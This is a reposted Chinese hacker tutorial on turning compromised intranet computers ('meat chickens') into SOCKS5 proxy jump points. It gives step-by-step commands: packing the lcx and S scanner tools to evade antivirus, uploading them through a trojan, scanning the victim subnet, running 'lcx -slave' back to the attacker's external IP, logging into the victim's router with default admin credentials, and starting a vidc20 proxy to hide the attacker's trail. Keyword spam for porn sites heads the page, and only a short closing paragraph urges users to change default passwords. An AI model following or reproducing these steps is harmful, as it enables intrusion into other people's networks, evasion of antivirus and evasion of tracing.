中文字幕在线观看,亚洲а∨天堂久久精品9966,亚洲成a人片在线观看你懂的,亚洲av成人片无码网站,亚洲国产精品无码久久久五月天

黑客教你將內網(wǎng)肉雞作成Socks5服務器

2017-11-30    來源:

容器云強勢上線!快速搭建集群,上萬Linux鏡像隨意使用

  有人說內網(wǎng)中作SOCKS5服務器不可能,即使作成了也無法利用,好,今天我就將我的一些實踐經驗寫出來與大家共享,沒什么技術含量,大家交流一下,如果大家有更好的方法,還請不吝賜教喲!

  話說在掛馬得到大量肉雞以后,眾黑友可能都在想如何利用手中的這些戰(zhàn)利品。有人喜歡偷窺人家的隱私,有的人可能就會用木馬的鍵盤記錄盜取人家的QQ密碼,還有的人可能要盜取人家的寬帶上網(wǎng)帳號充Q幣?纱蠹矣袥]有想到過將內網(wǎng)中的這些肉雞作成SOCKS5服務器呢?這樣的話,我們以后入侵就可以用這些肉雞作跳板,黑人家也會安全的多了。有人說內網(wǎng)中作SOCKS5服務器不可能,即使作成了也無法利用,好,今天我就將我的一些實踐經驗寫出來與大家共享,沒什么技術含量,大家交流一下,如果大家有更好的方法,還請不吝賜教喲!

  首先介紹一下使用的工具,lcx.exe 這是一個反向連接的內網(wǎng)端口映射工具,VIDC20.exe也是一個端口映射工具,不過它也有代理服務器的功能,支持http/socks4/socks5代理,支持代理驗證,支持udp代理,支持二級代理;還有S掃描器,這個只有一個可執(zhí)行文件,小巧方便,掃端口最合適了。這些工具在網(wǎng)上都有下載,在作代理服務之前,我們需要先作一下免殺,因為大部分殺毒軟件是殺lcx.exe和S掃描器的,如果不作免殺,那一上傳就可能被殺毒軟件給殺掉,如圖1:

圖1

  像這種強悍的卡巴,在命令行下是沒有辦法中止的,所以只能作免殺了,其他的殺毒軟件在命令行下可以中止,不過需要一些技巧,因為它們都有線程保護,用常規(guī)的方法是中止不了的。我曾經在命令行下干掉過瑞星,只是方法比較繁瑣,所以就不在這里演示了。至于免殺方法嘛,只要簡單的加下殼就可以過關了,據(jù)我實驗,先加個北斗3.5,再加aspack 2.12,之后再加北斗3.5,這樣處理后絕大部分殺軟件就不殺這兩個程序了,呵呵。簡單吧,殺毒軟件也是會區(qū)別對待的,如果是一些流行木馬,加這三重殼是不能免殺的,對于一些不太重要的黑客工具,殺毒軟件就會顯得相對寬松的多了。我們就是鉆的殺毒軟件的這個空子,如果是加了三重殼也過不了殺毒軟件,那就不要怕麻煩將它們的特征碼給修改掉,就可以過殺毒軟件了,修改的方法網(wǎng)上有許多動畫,大家可以自己找找,我的PCSHARE馬就是這樣作的,過卡巴,瑞星、江民、瑞星、金山、諾頓、趨勢等殺毒軟件很輕松,也可以輕松過各種查馬工具,這就是我修改特征碼后加了三重殼作成的,一個超強的工具。呵呵。有些跑題了,言歸正傳。

  工具準備完備后,下面開始作代理了。首先打開你的木馬客戶端程序,將上面的這些工具上傳到內網(wǎng)中的肉雞上,就放在WINDOWS目錄里吧,文件名嘛,最好改一下,免得引起對方注意。打開對方的命令符,鍵入命令:ipconfig /all查看一下肉雞的IP地址,如:192.168.0.2,得到這個本機及網(wǎng)關的IP地址以后,我們就可以用S掃描器對同它同一網(wǎng)段的IP地址進行掃描,看這臺肉雞的網(wǎng)關是什么類型的。S掃描器相信大家都會用了吧。

  命令行:s-jk tcp 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20

  這個s-jk是我加三重殼免殺后的S掃描器,這條命令在整個網(wǎng)段中掃描開放139 3389 1433 80 23端口的主機,呵呵,這是為滲透內部網(wǎng)絡作準備,也許有很重要的信息出現(xiàn)呢。哈哈。掃描結果如下圖2:

圖2

  經過掃描發(fā)現(xiàn)這臺肉雞的網(wǎng)關開放80號端口,這說明這臺網(wǎng)關一定是臺路由器。那怎樣登錄進它的路由器呢?大家都知道寬帶路由器在外網(wǎng)中是不能登錄的,只能由它的內部網(wǎng)絡登錄,難道要進肉雞的屏幕控制,用肉雞的IE登錄?非也,這樣很容易暴露,再說肉雞上的管理員也許現(xiàn)在正在電腦前工作,你是根本沒有辦法進行控制的,下面在自己的電腦上打開命令提示符,命令:lcx -listen 21 8000 再回到肉雞的CMD下,命令:lcx -slave 218.57.179.152 21 192.168.0.1 80 解釋一下:218.57.179.152是我的外網(wǎng)IP,這樣就將肉雞的寬帶路由器的80端口映射到了我的電腦的21端上了,我連接本機的8000端口就可以了。如圖3:

圖3

  下一步就要打開IE,地址欄中鍵入:http://127.0.0.1:8000回車后,盼望已久的并且很熟悉的登錄界面出現(xiàn)了。這正是寬帶路由器的登錄界面,只不過這不是我的寬帶路由器,而是另一個局域網(wǎng)的寬帶路由器,我熟練的鍵入的默認用戶名及密碼,admin admin,確定后成功登錄了。如圖4、圖5。

圖4

圖5

  接下來的工作簡直就是輕車熟路了,設置一個虛擬服務器指向這臺肉雞,端口設置成了個陌生的端口,不要設置成8080,因為寬帶路由器要使用這個端口,它是不允許設置成這個端口的,我設置的是2233,保存后,我們再回到肉雞的命令行下,命令:vidc20 -d -p 2233 這個命令的意思就是以控制臺的方式啟動vidc20.exe這個程序,開2233服務端口提供代理服務。這臺肉雞已經開始提供SOCK5服務了,并且路由器上的映射也已經正常工作,我們要作的就是打開SOCK5客戶端程序,設置一下SOCKS5服務器的IP地址及端口,也就是這臺肉雞的外網(wǎng)IP。我們將IE的圖標拖到SocksCap32的圖標上創(chuàng)建了一個新快捷方式,這樣以后我們登錄到ASP馬時就可以雙擊SocksCap32中的IE進行登錄了。如果你覺得不放心,可以登錄ip.knowsky.com,查看一下IP,IP地址顯示的是你的肉雞的IP,使用這種代理比使用匿名的HTTP代理還要安全的多,因為給你提供代理的是臺個人電腦,并且IP不固定,在一個局域網(wǎng)內部,沒有一些監(jiān)控軟件記錄任何的連接,并且這臺個人電腦重啟后vidc20.exe并不在運行,可以說是毫無痕跡,這樣即使有人追查你的話,也只能查到你肉雞的IP為止,再想繼續(xù)追查就不太容易了。

  有人說如果管理員把寬帶路由器的密碼改掉了,那不是沒得玩了,我隨機挑選了五個局域網(wǎng)進行測試,全部是默認口令,看來設置默認口令的概率還是滿高的。我分析了一下原因:一、可能是寬帶路由器只能由內網(wǎng)連接,管理員對其安全性認識不足。二、內網(wǎng)中的電腦用戶都是菜鳥,不需要作安全設置。三、管理員懈怠,沒把它當回事。說實話我的寬帶路由器也是設置的默認口令,為什么沒有改掉呢?我覺得我應該屬于第二種情況吧,內網(wǎng)中全部是菜鳥用戶,所以根本必要修改掉,這樣就暴露了一個安全問題,一旦內網(wǎng)中的電腦中了木馬,入侵者就有可能獲得你的寬帶帳號,用你的寬帶帳號刷Q幣、刷業(yè)務;還可能登錄你的ISP將你的寬帶帳號給修改掉,讓你上不了網(wǎng)了。如果入侵者拿你作跳板,他作了壞事由你背黑鍋,那豈不是更加冤枉。所以,大家一定對內網(wǎng)的安全問題提高警惕。該打的補丁打上,該修改的默認口令給修改掉,這樣就可以抵御大多數(shù)初級的入侵者的攻擊了。但要想絕對安全,那是不可能的,這個世界上沒有絕對的安全。

標簽: idc isp 安全 代理服務器 服務器 網(wǎng)絡 問題 虛擬服務器 隱私 用戶

版權申明:本站文章部分自網(wǎng)絡,如有侵權,請聯(lián)系:west999com@outlook.com
特別注意:本站所有轉載文章言論不代表本站觀點!
本站所提供的圖片等素材,版權歸原作者所有,如需使用,請與原作者聯(lián)系。

上一篇:DOS.kitana.b

下一篇:Win32.Troj.GetQQP12